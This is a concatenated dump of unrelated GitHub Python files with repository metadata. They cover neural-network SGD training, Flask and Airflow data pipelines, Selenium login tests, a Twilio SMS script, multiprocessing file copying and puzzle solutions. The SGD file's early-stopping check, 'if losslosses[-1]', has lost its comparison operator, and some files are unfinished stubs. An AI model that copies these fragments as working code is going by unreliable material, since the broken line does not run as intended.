self.output_correction - np.sum(self.delta_output,axis=0)*(1.0/case.shape[0])#更新输出偏置\n self.input_weights = self.input_weights - alpha*(case.T*self.delta_hidden)#更新输入权重\n self.input_correction = self.input_correction - np.sum(self.delta_hidden,axis=0)*(1.0/case.shape[0])#更新输入偏置\n \n # 求当前误差 \n loss = 0.0 \n for o in range(label.shape[0]): \n loss += 0.5 * (label[o] - self.p_out[o]) ** 2\n return loss \n\n def SGD(self,max_iter,loss_thre,lr,x_train,y_train,x_test,y_test):\n #随机梯度下降训练网络\n losses = []\n iters = []\n flag = 0\n for i in range(max_iter):\n ind = np.random.randint(0,x_train.shape[0],1)#随机采样\n x = x_train[ind]\n y = y_train[ind]\n \n self.back_propagate(case=x,label = y,alpha =lr)#反向传播训练网络\n if i%500==0:#性能评估\n pre = self.predict(x_test)\n loss=0\n for j in range(pre.shape[0]):\n loss+=(pre[j,0]-y_test[j])**2\n loss = loss/pre.shape[0]\n losses.append(loss)\n iters.append(i)\n \n\n print('after {} iters get loss {} on test data'.format(i,loss))#输出日志\n if losslosses[-1]:#提前停止训练防止过拟合\n flag+=1\n if flag>2:\n print('over fitting,training is done')\n return losses,iters\n else:flag = 0\n\n\n print('training is done')\n return losses,iters\n\n \n \n \n \n \n ","repo_name":"submarinecantfly/sgd","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"17767866030","text":"from flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\n@app.route('/upload', methods=['POST'])\ndef handle_upload():\n file = request.files['file']\n # parse and preprocess file data\n data = process_data(file)\n return jsonify(data)\n\ndef process_data(file):\n # read and parse file contents\n # clean and transform data\n return data\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"LorisGr/DATA_VISUALIZATIONS_tool","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"32378563365","text":"from .db import db, environment, SCHEMA, add_prefix_for_prod\n\nclass Game(db.Model):\n\n \n __tablename__ = 'games'\n\n\n if environment == 'production':\n __table_args__ = {'schema': SCHEMA}\n\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.Text, nullable=False)\n\n\n def to_dict(self):\n return {\n \"id\": self.id,\n \"name\": self.name\n }","repo_name":"MichaelLacey/Esportscenter_Clone","sub_path":"app/models/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9875890380","text":"from datetime import time\nimport pandas as pd\n\nfrom knmy import knmy\nimport constants\n\n\ndef load_data_temp(stationnumber, startdate, enddate):\n \"\"\"\n Met knmy.get hourly wordt doormiddel van het stationnummer, een startdatum en einddatum (YYYYMMDDHH)\n de variable TEMP een temperatuurdataset opgehaald van de gekozen periode.\n Bij het opvragen van de dataset is de tijd en datum gescheiden over 2 kolommen en in een verkeerd\n format. Onderstaande zet deze om naar 1 kolom in YYYY-MM-DD HH\n Namen van kolommen omzetten,\n temperatuur is gegeven met 1 decimaal, zonder scheidingsteken\n Kolommen met data verwijderen, welke niet nodig zijn.\n \"\"\"\n df = knmy.get_hourly_data(stations=[stationnumber],\n start=startdate,\n end=enddate,\n variables=['TEMP'],\n parse=True)[3:]\n df = pd.DataFrame(df[0])\n\n df[\"YYYYMMDD\"] = pd.to_datetime(df[\"YYYYMMDD\"], format='%Y%m%d')\n df[\"YYYYMMDD\"] += pd.to_timedelta(df[\"H\"], unit='h')\n df.rename(columns={'YYYYMMDD': 'tijdstempel', \"T\": \"t\"}, inplace=True)\n df[\"t\"] = df[\"t\"] * 0.1\n df.drop(columns=['STN', 'H', 'TD', 'T10N'], inplace=True, axis=1)\n df.set_index(\"tijdstempel\", inplace=True)\n\n return df\n\n\ndef set_temp(df, start_time, end_time):\n \"\"\"\n Set de gebruikers temperatuur voor binnen in over de periode. Hierbij kan er gekozen worden voor constant\n op dezelfde temperatuur of nachtschakeling.\n \"\"\"\n df['t_in'] = constants.t_in_nacht\n mask = df.between_time(time(start_time), time(end_time - 1))\n df.loc[mask.index, 't_in'] = constants.t_in\n\n df['t_adj'] = df['t_in']\n df['t_average'] = df['t'].mean()\n\n df['t_out_corr'] = df['t'] + (0.016\n * constants.tauw\n * 0.8)\n df['t_corr1'] = constants.t_corr1\n df['t_corr2'] = constants.t_corr2\n\n return df\n","repo_name":"robinvp1901/HU_LE1_C_sim_heatpump","sub_path":"temp/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"27116993456","text":"from login_page import LoginPage\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.chrome.service import Service as ChromeService\r\nfrom webdriver_manager.chrome import ChromeDriverManager\r\n\r\n\r\nclass Test1:\r\n driver = webdriver.Chrome(service=ChromeService(ChromeDriverManager().install()))\r\n problem_users = []\r\n\r\n # Check title 'Products'\r\n def check_title(self):\r\n products_title = WebDriverWait(self.driver, 5).until(\r\n EC.element_to_be_clickable((By.XPATH, \"//span[@class='title']\")))\r\n products_title_text = products_title.text\r\n # Assert title's text\r\n assert products_title_text == 'Products', 'Different titles!'\r\n print('Login SUCCESS!')\r\n print('Headings match!')\r\n\r\n # LogOut\r\n def log_out(self):\r\n button_burger_menu = self.driver.find_element(By.ID, 'react-burger-menu-btn')\r\n button_burger_menu.click()\r\n logout_burger_menu = WebDriverWait(self.driver, 2).until(\r\n EC.element_to_be_clickable((By.ID, \"logout_sidebar_link\")))\r\n logout_burger_menu.click()\r\n\r\n def test_login(self):\r\n base_url = 'https://www.saucedemo.com/'\r\n logins = ['standard_user', 'problem_user', 'locked_out_user', 'performance_glitch_user']\r\n password_all = 'secret_sauce'\r\n\r\n self.driver.get(base_url)\r\n self.driver.maximize_window()\r\n\r\n print('++++++++++++++++ Start Test_1 ++++++++++++++++\\n')\r\n\r\n login_page = LoginPage(self.driver)\r\n\r\n for login in logins:\r\n # Authorization\r\n print(f'****************Test login \"{login}\" - STARTED!****************')\r\n login_page.authorization(login, password_all)\r\n\r\n try:\r\n self.check_title()\r\n self.log_out()\r\n except:\r\n print(f'!!!!!!!!- User with login \"{login}\" isn\\'t authorized -!!!!!!!!')\r\n self.problem_users.append(login)\r\n self.driver.refresh()\r\n\r\n print(f'****************Test login \"{login}\" - FINISHED!****************\\n')\r\n\r\n if self.problem_users:\r\n print(\r\n '!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Test_1 partially successful !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\r\n print(f'There are problems with user/users: {self.problem_users}')\r\n else:\r\n print('Test_1 Success!')\r\n print('++++++++++++++++ FINISH Test_1 ++++++++++++++++\\n')\r\n\r\n\r\ntest = Test1()\r\ntest.test_login()\r\n","repo_name":"DmitryVS-git/alex_selenium_course","sub_path":"Alex_selenium_course_basics/tasks/task_4/task_4_authorization_oop.py","file_name":"task_4_authorization_oop.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"12130435721","text":"def SeatingStudents(arr):\n # Extract the total number of seats (K) from the first element of the input array\n K = int(arr[0])\n\n # Extract the list of reserved seats from the remaining elements of the input array\n reserved = [int(n) for n in arr[1:]]\n\n # If the number of reserved seats is equal to the total number of seats (K),\n # there are no available seats for students, so return 0.\n if len(reserved) == K:\n return 0\n\n # Initialize a variable to count the valid seating combinations\n combinations = 0\n\n # Loop through each seat from 1 to K\n for i in range(1, K + 1):\n # Skip the seat if it is reserved\n if i in reserved:\n continue\n\n # Calculate neighboring seats based on whether the seat number is even or odd\n if i % 2 != 0: # If the seat number is odd\n neighboring = [i - 2, i + 1, i + 2] # Neighboring seats are two seats back and one and two seats forward\n else: # If the seat number is even\n neighboring = [i - 2, i - 1,\n i + 2] # Neighboring seats are two seats back, one seat back, and two seats forward\n\n # Check if each neighboring seat is valid (within the range 1 to K) and not reserved\n for j in neighboring:\n if j < 1 or K < j or j in reserved:\n continue\n combinations += 1 # Increment the combinations count for each valid neighboring seat\n\n # The total number of combinations counted includes symmetric combinations where seats\n # have been swapped (e.g., seat 1 and seat 2 are considered the same as seat 2 and seat 1).\n # So, we divide the total combinations by 2 to avoid counting symmetric combinations twice.\n return combinations // 2\n\n\n# Keep this function call here\nprint(SeatingStudents(input()))\n","repo_name":"kirillfr97/coding_challenges","sub_path":"seating_students/seating_students.py","file_name":"seating_students.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74480429343","text":"from twilio.rest import Client\r\n\r\nimport keys\r\n\r\n\r\nclient = Client(keys.account_sid, keys.auth_token)\r\nmessage = client.messages.create(\r\n \r\n body=\"OLÀ MEU NOME È FULANO\",\r\n from_=keys.twilio_number,\r\n to=keys.target_number\r\n \r\n \r\n \r\n)\r\n\r\nprint(message.body)","repo_name":"madrade1472/Enviando-SMS-utilizando-Python-e-Twilio","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"70098001822","text":"import airflow\nimport os\n\nimport psycopg2\nimport time\n\nfrom airflow import DAG\nfrom airflow.operators.bash import BashOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.exceptions import AirflowFailException\n\nfrom datetime import datetime, timedelta\n\nfrom pyspark.sql import SparkSession\nimport pyspark.sql.functions as f\nfrom pyspark.sql.types import StructType, StructField, StringType, IntegerType, DateType, LongType, DoubleType\n\nfrom src.conf import CREDENTIALS\nfrom loguru import logger\nfrom src.log_df import log_df\n\n### GLOBALS\nDAGNAME = 'agg_data'\n\nHOST = CREDENTIALS['host']\nPORT = CREDENTIALS['port']\nDB = CREDENTIALS['db']\nUSER = CREDENTIALS['user']\nPW = CREDENTIALS['pw']\n\n# logger\nlogger.add('/opt/airflow/logs/python_log.log')\n\nargs = {\n 'owner': 'airflow',\n #'start_date' : datetime(2021, 11, 26),\n #'catchup': True, \n 'provide_context': True,\n #'retries': 5,\n #'retry_delay': timedelta(minutes=5)\n}\n\n\n### DAGS\ndef check_db():\n WAITING = 30\n\n conn_string = f\"dbname='{DB}' user='{USER}' host='{HOST}' port='{PORT}' password='{PW}' connect_timeout=1 \"\n def postgres_test(i=None):\n # try to connect to DB\n try:\n conn = psycopg2.connect(conn_string)\n conn.close()\n if i:\n print(f'Connections are accepted (on attempt - {i})')\n return True\n except:\n if i:\n print(f'DB doesnt accept connections! (try - {i})')\n else:\n print('DB doesnt accept connections!')\n return False\n\n # connection test\n for i in range(10):\n k = postgres_test(i+1)\n\n if k:\n #print(f'DB accepts connections! (on try {i+1})')\n break\n\n print(f\"Waiting for {WAITING} seconds before retry!\")\n time.sleep(WAITING)\n \n if not k:\n raise AirflowFailException(\"Database unaviable!\")\n\ndef agg_data(ds, **kwargs):\n\n # get filename - execution date\n filename = f'{kwargs[\"logical_date\"].date()}.csv'\n filename_parquet = f'{kwargs[\"logical_date\"].date()}'\n\n # create spark\n #spark = SparkSession.builder.config(\"spark.driver.memory\", \"2G\").getOrCreate()\n spark = SparkSession.builder\\\n .config(\"spark.driver.memory\", \"2G\") \\\n .config(\"spark.jars\", \"/opt/airflow/jars/postgresql-42.3.1.jar\") \\\n .getOrCreate()\n\n\n # schema for csv\n schema = StructType() \\\n .add(\"event_time\", DateType(),True) \\\n .add(\"event_type\", StringType(),True) \\\n .add(\"product_id\", IntegerType(),True) \\\n .add(\"category_id\", LongType(),True) \\\n .add(\"category_code\", StringType(),True) \\\n .add(\"brand\", StringType(),True) \\\n .add(\"price\", DoubleType(),True) \\\n .add(\"user_id\", IntegerType(),True) \\\n .add(\"user_session\", StringType(),True) \\\n .add(\"date\", DateType(),True)\n\n # read csv file and apply schema\n df = spark.read.format(\"csv\") \\\n .option(\"header\", True) \\\n .schema(schema) \\\n .load(f\"/data/{filename}\")\n\n # количество просмотров по категориям (date, category, views_count)\n df_cat = df\\\n .where(\"event_type == 'view'\")\\\n .groupBy(\"date\", \"category_code\")\\\n .agg(\n f.count(\"*\").alias(\"views_count\")\n )\n\n # продажи товаров брендов (date, brand, purchase_count)\n df_sale = df\\\n .where(\"event_type == 'purchase'\")\\\n .groupBy(\"date\", \"brand\")\\\n .agg(\n f.count(\"*\").alias(\"purchase_count\")\n )\n\n # log schemas and explain\n logger.info(log_df(df_cat, \"DF_CAT\", \"explain\"))\n logger.info(log_df(df_cat, \"DF_CAT\", \"schema\"))\n logger.info(log_df(df_sale, \"DF_SALE\", \"explain\"))\n logger.info(log_df(df_sale, \"DF_SALE\", \"schema\"))\n\n\n #df.printSchema()\n #df_cat.printSchema()\n #df_sale.printSchema()\n\n # save to parquet\n df_cat.repartition(1).write.mode(\"overwrite\").format(\"parquet\").save(f\"/data/{filename_parquet}_cat.parquet\")\n logger.info(f\"{filename_parquet}_cat.parquet HAS BEEN SAVED SUCCESFUL!\")\n df_sale.repartition(1).write.mode(\"overwrite\").format(\"parquet\").save(f\"/data/{filename_parquet}_sale.parquet\")\n logger.info(f\"{filename_parquet}_sale.parquet HAS BEEN SAVED SUCCESFUL!\")\n \n # load to PostgreSQL\n url = f\"jdbc:postgresql://{HOST}:{PORT}/{DB}\"\n TARGET_TABLE = \"public.category_table\"\n\n (\n df_cat\n .write\n .option(\"driver\", \"org.postgresql.Driver\")\n .format(\"jdbc\")\n .mode(\"append\")\n .option(\"url\", url)\n .option(\"user\", USER)\n .option(\"password\", PW)\n .option(\"dbtable\", TARGET_TABLE)\n .option(\"fetchsize\", 10000)\n .save(TARGET_TABLE)\n )\n logger.info(f\"DATA HAS BEEN UPLOADED TO {DB}!\")\n \n\ndag = airflow.DAG(\n DAGNAME,\n schedule_interval='0 20 * * *',\n start_date=datetime(2021, 11, 26),\n catchup=True,\n dagrun_timeout=timedelta(minutes=60),\n #default_args=args,\n tags=['homework'],\n max_active_runs=1,\n)\n\ncheck_postgre = PythonOperator(task_id='check_db',\n python_callable=check_db,\n #provide_context=False,\n dag=dag)\n\n\ndownload_data = BashOperator(\n task_id='download_data',\n bash_command='cd /data; wget http://37.139.43.86/events/{{ ds }}; mv {{ ds }} {{ ds }}.csv',\n dag=dag\n )\n\nagg_data = PythonOperator(task_id='agg_data',\n python_callable=agg_data,\n #provide_context=False,\n dag=dag)\n\n\n### TASK QUEUE\ncheck_postgre >> download_data >> agg_data\n","repo_name":"YAKOROLEVAZAMKA/spark_course","sub_path":"airflow/dags/dag_daily.py","file_name":"dag_daily.py","file_ext":"py","file_size_in_byte":5785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72863983582","text":"import functools\nimport os\nimport subprocess\nimport torch\nimport torch.distributed as dist\nimport torch.multiprocessing as mp\n\n\n# ----------------------------------\n# init\n# ----------------------------------\ndef init_dist(launcher, backend='hccl', **kwargs):\n if mp.get_start_method(allow_none=True) is None:\n mp.set_start_method('spawn')\n if launcher == 'pytorch':\n _init_dist_pytorch(backend, **kwargs)\n elif launcher == 'slurm':\n _init_dist_slurm(backend, **kwargs)\n else:\n raise ValueError(f'Invalid launcher type: {launcher}')\n\n\ndef _init_dist_pytorch(backend, **kwargs):\n rank = int(os.environ['RANK'])\n num_gpus = torch.npu.device_count()\n torch.npu.set_device(rank % num_gpus)\n dist.init_process_group(backend=backend, **kwargs)\n\n\ndef _init_dist_slurm(backend, port=None):\n \"\"\"Initialize slurm distributed training environment.\n If argument ``port`` is not specified, then the master port will be system\n environment variable ``MASTER_PORT``. If ``MASTER_PORT`` is not in system\n environment variable, then a default port ``29500`` will be used.\n Args:\n backend (str): Backend of torch.distributed.\n port (int, optional): Master port. Defaults to None.\n \"\"\"\n proc_id = int(os.environ['SLURM_PROCID'])\n ntasks = int(os.environ['SLURM_NTASKS'])\n node_list = os.environ['SLURM_NODELIST']\n num_gpus = torch.npu.device_count()\n torch.npu.set_device(proc_id % num_gpus)\n addr = subprocess.getoutput(\n f'scontrol show hostname {node_list} | head -n1')\n # specify master port\n if port is not None:\n os.environ['MASTER_PORT'] = str(port)\n elif 'MASTER_PORT' in os.environ:\n pass # use MASTER_PORT in the environment variable\n else:\n # 29500 is torch.distributed default port\n os.environ['MASTER_PORT'] = '29500'\n os.environ['MASTER_ADDR'] = addr\n os.environ['WORLD_SIZE'] = str(ntasks)\n os.environ['LOCAL_RANK'] = str(proc_id % num_gpus)\n os.environ['RANK'] = str(proc_id)\n dist.init_process_group(backend=backend)\n\n\n\n# ----------------------------------\n# get rank and world_size\n# ----------------------------------\ndef get_dist_info():\n if dist.is_available():\n initialized = dist.is_initialized()\n else:\n initialized = False\n if initialized:\n rank = dist.get_rank()\n world_size = dist.get_world_size()\n else:\n rank = 0\n world_size = 1\n return rank, world_size\n\n\ndef get_rank():\n if not dist.is_available():\n return 0\n\n if not dist.is_initialized():\n return 0\n\n return dist.get_rank()\n\n\ndef get_world_size():\n if not dist.is_available():\n return 1\n\n if not dist.is_initialized():\n return 1\n\n return dist.get_world_size()\n\n\ndef master_only(func):\n\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n rank, _ = get_dist_info()\n if rank == 0:\n return func(*args, **kwargs)\n\n return wrapper\n\n\n\n\n\n\n# ----------------------------------\n# operation across ranks\n# ----------------------------------\ndef reduce_sum(tensor):\n if not dist.is_available():\n return tensor\n\n if not dist.is_initialized():\n return tensor\n\n tensor = tensor.clone()\n dist.all_reduce(tensor, op=dist.ReduceOp.SUM)\n\n return tensor\n\n\ndef gather_grad(params):\n world_size = get_world_size()\n \n if world_size == 1:\n return\n\n for param in params:\n if param.grad is not None:\n dist.all_reduce(param.grad.data, op=dist.ReduceOp.SUM)\n param.grad.data.div_(world_size)\n\n\ndef all_gather(data):\n world_size = get_world_size()\n\n if world_size == 1:\n return [data]\n\n buffer = pickle.dumps(data)\n storage = torch.ByteStorage.from_buffer(buffer)\n tensor = torch.ByteTensor(storage).to('npu')\n\n local_size = torch.IntTensor([tensor.numel()]).to('npu')\n size_list = [torch.IntTensor([0]).to('npu') for _ in range(world_size)]\n dist.all_gather(size_list, local_size)\n size_list = [int(size.item()) for size in size_list]\n max_size = max(size_list)\n\n tensor_list = []\n for _ in size_list:\n tensor_list.append(torch.ByteTensor(size=(max_size,)).to('npu'))\n\n if local_size != max_size:\n padding = torch.ByteTensor(size=(max_size - local_size,)).to('cpu')\n tensor = torch.cat((tensor, padding), 0)\n\n dist.all_gather(tensor_list, tensor)\n\n data_list = []\n\n for size, tensor in zip(size_list, tensor_list):\n buffer = tensor.cpu().numpy().tobytes()[:size]\n data_list.append(pickle.loads(buffer))\n\n return data_list\n\n\ndef reduce_loss_dict(loss_dict):\n world_size = get_world_size()\n\n if world_size < 2:\n return loss_dict\n\n with torch.no_grad():\n keys = []\n losses = []\n\n for k in sorted(loss_dict.keys()):\n keys.append(k)\n losses.append(loss_dict[k])\n\n losses = torch.stack(losses, 0)\n dist.reduce(losses, dst=0)\n\n if dist.get_rank() == 0:\n losses /= world_size\n\n reduced_losses = {k: v for k, v in zip(keys, losses)}\n\n return reduced_losses\n\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"PyTorch/contrib/cv/others/SwinIR/utils/utils_dist.py","file_name":"utils_dist.py","file_ext":"py","file_size_in_byte":5163,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"} +{"seq_id":"28303173074","text":"\"\"\"\n 练习:\n 使用进程池,备份一个目录,该目录中包含若干个普通文件,\n 提示:\n os.listdir()得到目录下所有文件\n os.path.getsize()获取文件大小\n os.mkdir()创建一个目录\n 要求:\n 至少同时拷贝4个文件,并且只能创建4个进程,使用进程池Pool(4)\n 事件:拷贝一个文件就是一个事件\n\n\n 进阶版:拷贝过程中实时打印拷贝的百分比 0% -- %100\n 不断获取已经拷贝的大小,flush()\n 然后,已经拷贝的/源文件大小 * 100%\n\"\"\"\n\nfrom multiprocessing import Pool, Queue\nimport os\n\nq = Queue(3)\n\n\n# 拷贝一个文件\n# 拷贝啥,从哪拷,拷到哪\ndef copy_file(file, old_dir, new_dir):\n fr = open(old_dir+\"/\"+file, \"rb\")\n fw = open(new_dir+ \"/\"+file, \"wb\")\n while True:\n data = fr.read(1024*10)\n if not data:\n break\n n = fw.write(data)\n q.put(n) # 字节数传入��息对垒\n fr.close()\n fw.close()\n\ndef main():\n \"\"\"\n 创建进程池,调用拷贝文件的函数作为事件\n \"\"\"\n base_path = \"/home/tarena/\" # 基准目录\n dir = input(\"Dir:\") #要备份的目录\n old_dir = base_path + dir # 要备份的目录的全路径\n new_dir = old_dir + \"-备份\" # 拷贝到这里\n os.mkdir(new_dir) # 创建新地址\n file_list = os.listdir(old_dir) # 拷这些文件\n\n # 获取目录的总大小\n total_size = 0\n for i in file_list:\n total_size += os.path.getsize(old_dir+\"/\"+i)\n\n\n # 创建进程池\n pool = Pool(4)\n for file in file_list:\n pool.apply_async(copy_file, args=(file, old_dir, new_dir))\n\n pool.close()\n\n\n print(\"目录大小:%.2fM\"%(total_size/1024/1024))\n copy_size = 0 # 已经拷贝的大小\n while copy_size < total_size:\n copy_size += q.get()\n print(\"拷贝了 %.1f%%\"%(copy_size/total_size*100))\n\n pool.join()\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# from multiprocessing import Pool\n# import os\n#\n#\n#\n# file_addr = \"/home/tarena/hello/\"\n# file_num = os.listdir(file_addr)\n# # print(file_num)   ['b.txt', 'e.txt', 'd.txt', 'c.txt', 'a.sql', 'f.txt']\n# os.mkdir(\"copy_file\")\n#\n#\n# def copy_1_file(file_name):\n# fr = open(file_addr+file_name, \"rb\")\n# fw = open(\"copy_file\"+file_name, \"wb\")\n# fw.write(fr.read())\n# fr.close()\n# fw.close()\n#\n#\n#\n#\n# pool = Pool(4)\n#\n#\n# for i in range(4):\n#\n# pool.apply_async(func=copy_1_file, args=(file_name, ))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"nandadao/Python_note","sub_path":"note/my_note/second_month/day07/pool_copy.py","file_name":"pool_copy.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"37122572196","text":"import discord\n\nfrom typing import Union\nfrom data.model.case import Case\nfrom data.model.guild import Guild\nfrom data.services.guild_service import guild_service\nfrom data.services.user_service import user_service\nfrom utils.context import ChromeyContext\nfrom utils.mod.mod_logs import prepare_ban_log, prepare_kick_log\n\nfrom utils.config import cfg\n\n\nasync def add_kick_case(ctx: ChromeyContext, user, reason, db_guild):\n \"\"\"Adds kick case to user\n\n Parameters\n ----------\n ctx : ChromeyContext\n \"Bot context\"\n user : discord.Member\n \"Member who was kicked\"\n reason : str\n \"Reason member was kicked\"\n db_guild\n \"Guild DB\"\n\n \"\"\"\n # prepare case for DB\n case = Case(\n _id=db_guild.case_id,\n _type=\"KICK\",\n mod_id=ctx.author.id,\n mod_tag=str(ctx.author),\n reason=reason,\n )\n\n # increment max case ID for next case\n guild_service.inc_caseid()\n # add new case to DB\n user_service.add_case(user.id, case)\n\n return prepare_kick_log(ctx.author, user, case)\n\n\nasync def notify_user(user, text, log):\n \"\"\"Notifies a specified user about something\n\n Parameters\n ----------\n user : discord.Member\n \"User to notify\"\n text : str\n \"Text to send\"\n log : discord.Embed\n \"Embed to send\"\n \"\"\"\n try:\n await user.send(text, embed=log)\n except Exception:\n db_guild = guild_service.get_guild()\n channel = user.guild.get_channel(db_guild.channel_offtopic)\n if channel is None:\n return\n await channel.send(f\"{user.mention}, I tried to DM you this but your DMs are closed!\\n{text}\", embed=log)\n\n return True\n\n\nasync def notify_user_warn(ctx: ChromeyContext, user: discord.User, log):\n \"\"\"Notifies a specified user about a warn\n\n Parameters\n ----------\n ctx : ChromeyContext\n \"Bot context\"\n user : discord.Member\n \"User to notify\"\n log : discord.Embed\n \"Embed to send\"\n \"\"\"\n\n if isinstance(user, discord.Member):\n # await notify_user(user, f\"You were warned in {ctx.guild.name}.\", log)\n try:\n await user.send(f\"You were warned in {ctx.guild.name}.\", embed=log)\n except Exception:\n db_guild = guild_service.get_guild()\n channel = user.guild.get_channel(db_guild.channel_offtopic)\n if channel is None:\n return\n await channel.send(f\"{user.mention}, I tried to DM you this but your DMs are closed!\\nYou were warned in {ctx.guild.name}.\", embed=log)\n\n\nasync def submit_mod_log(ctx: ChromeyContext, db_guild: Guild, user: Union[discord.Member, discord.User], log):\n \"\"\"Submits a public log\n\n Parameters\n ----------\n ctx : ChromeyContext\n \"Bot context\"\n user : discord.Member\n \"User to notify\"\n db_user\n \"User DB\"\n db_guild\n \"Guild DB\"\n log : discord.Embed\n \"Embed to send\"\n \"\"\"\n modlogs_chan = ctx.guild.get_channel(\n db_guild.channel_modlogs)\n if modlogs_chan:\n log.remove_author()\n log.set_thumbnail(url=user.display_avatar)\n await modlogs_chan.send(embed=log)\n\n\nasync def add_ban_case(ctx: ChromeyContext, user: discord.User, reason, db_guild: Guild = None):\n \"\"\"Adds ban case to user\n\n Parameters\n ----------\n ctx : ChromeyContext\n \"Bot context\"\n user : discord.Member\n \"Member who was banned\"\n reason : str\n \"Reason member was banned\"\n db_guild\n \"Guild DB\"\n\n \"\"\"\n # prepare the case to store in DB\n case = Case(\n _id=db_guild.case_id,\n _type=\"BAN\",\n mod_id=ctx.author.id,\n mod_tag=str(ctx.author),\n punishment=\"PERMANENT\",\n reason=reason,\n )\n\n # increment DB's max case ID for next case\n guild_service.inc_caseid()\n # add case to db\n user_service.add_case(user.id, case)\n # prepare log embed to send to #public-mod-logs, user and context\n return prepare_ban_log(ctx.author, user, case)\n","repo_name":"DiscordGIR/ChromeyRewrite","sub_path":"utils/mod/modactions_helpers.py","file_name":"modactions_helpers.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42897948397","text":"import unittest\n\nimport aoc\nimport day22\n\n\nclass TestDay21(unittest.TestCase):\n\n def test_deal_into_new_stack(self):\n techniques = [\n \"deal into new stack\"\n ]\n deck = day22.DeckOfSpaceCards(10)\n deck.shuffle(techniques)\n cards = deck.get_all_cards()\n self.assertEqual(list(map(int, \"9 8 7 6 5 4 3 2 1 0\".split())), cards)\n\n def test_cut_n(self):\n techniques = [\n \"cut 3\"\n ]\n deck = day22.DeckOfSpaceCards(10)\n deck.shuffle(techniques)\n cards = deck.get_all_cards()\n self.assertEqual(list(map(int, \"3 4 5 6 7 8 9 0 1 2\".split())), cards)\n\n def test_cut_n_negative(self):\n techniques = [\n \"cut -4\"\n ]\n deck = day22.DeckOfSpaceCards(10)\n deck.shuffle(techniques)\n cards = deck.get_all_cards()\n self.assertEqual(list(map(int, \"6 7 8 9 0 1 2 3 4 5\".split())), cards)\n\n def test_deal_with_increment(self):\n techniques = [\n \"deal with increment 3\"\n ]\n deck = day22.DeckOfSpaceCards(10)\n deck.shuffle(techniques)\n cards = deck.get_all_cards()\n self.assertEqual(list(map(int, \"0 7 4 1 8 5 2 9 6 3\".split())), cards)\n\n def test_part1_example1(self):\n techniques = [\n \"deal with increment 7\",\n \"deal into new stack\",\n \"deal into new stack\",\n ]\n expected = \"0 3 6 9 2 5 8 1 4 7\"\n deck = day22.DeckOfSpaceCards(10)\n deck.shuffle(techniques)\n cards = deck.get_all_cards()\n self.assertEqual(list(map(int, expected.split())), cards)\n\n def test_part2_example2(self):\n techniques = [\n \"cut 6\",\n \"deal with increment 7\",\n \"deal into new stack\",\n ]\n expected = \"3 0 7 4 1 8 5 2 9 6\"\n deck = day22.DeckOfSpaceCards(10)\n deck.shuffle(techniques)\n cards = deck.get_all_cards()\n self.assertEqual(list(map(int, expected.split())), cards)\n\n def test_part2_example3(self):\n techniques = [\n \"deal with increment 7\",\n \"deal with increment 9\",\n \"cut -2\",\n ]\n expected = \"6 3 0 7 4 1 8 5 2 9\"\n deck = day22.DeckOfSpaceCards(10)\n deck.shuffle(techniques)\n cards = deck.get_all_cards()\n self.assertEqual(list(map(int, expected.split())), cards)\n\n def test_part2_example4(self):\n techniques = [\n \"deal into new stack\",\n \"cut -2\",\n \"deal with increment 7\",\n \"cut 8\",\n \"cut -4\",\n \"deal with increment 7\",\n \"cut 3\",\n \"deal with increment 9\",\n \"deal with increment 3\",\n \"cut -1\",\n ]\n expected = \"9 2 5 8 1 4 7 0 3 6\"\n deck = day22.DeckOfSpaceCards(10)\n deck.shuffle(techniques)\n cards = deck.get_all_cards()\n self.assertEqual(list(map(int, expected.split())), cards)\n\n def test_part1_input(self):\n result = day22.part1(aoc.read_input('day22.input'))\n self.assertEqual(6326, result)\n\n @unittest.skip\n def test_part2_input(self):\n result = day22.part2(aoc.read_input('day22.input'))\n self.assertEqual(40522432670594, result)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"zhatt/adventofcode2019","sub_path":"test_day22.py","file_name":"test_day22.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7621040822","text":"import 